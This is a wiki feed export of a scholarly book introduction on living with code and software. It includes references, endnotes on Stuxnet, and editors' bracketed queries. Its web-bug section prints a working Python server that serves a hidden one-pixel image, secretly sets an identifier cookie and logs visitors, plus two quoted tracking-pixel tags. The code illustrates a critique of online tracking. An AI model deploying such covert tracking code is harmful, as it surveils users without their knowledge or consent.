&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Latour, B. (2005) ''Reassembling the Social: An Introduction to Actor-Network-Theory'', Oxford: Oxford University Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs) and document object model storage (DOM Storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; careful analysis of the accidentally photographed background images on computers used by the president confirmed the importance of the cascade structure, centrifuge layout and the enriching process, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may have been three versions of the Stuxnet code: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] ''Compactants'': computational actants, drawing the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4698</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4698"/>
		<updated>2012-04-18T13:41:56Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, although it remains within the purview of humans to seek to understand this delegated agency. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ''ecology'' in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers them. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?] if we had not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, which I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally specified as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users has important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
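&lt;br /&gt;
To see how little machinery this mechanism requires, consider the following server-side sketch in Python: it answers requests for a one-pixel image, secretes an identifying cookie onto the client on first contact, and logs every subsequent visit. The cookie name, port and logging are invented for illustration. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer

# a 1x1 transparent GIF, the classic web bug payload
PIXEL = bytes.fromhex(
    '47494638396101000100800000000000ffffff'
    '21f90401000000002c000000000100010000'
    '02024401003b')

class WebBug(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = self.headers.get('Cookie', '')
        self.send_response(200)
        self.send_header('Content-Type', 'image/gif')
        if 'uid=' not in cookie:
            # first visit: secrete a persistent identifier onto the client
            self.send_header('Set-Cookie', 'uid=' + uuid.uuid4().hex)
        self.end_headers()
        self.wfile.write(PIXEL)
        # 'state' accumulates server-side: who, from where, viewing what
        print(self.client_address[0], self.path, cookie)

HTTPServer(('', 8080), WebBug).serve_forever()
&amp;lt;/pre&amp;gt; &lt;br /&gt;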
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company], it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user, code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any)&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
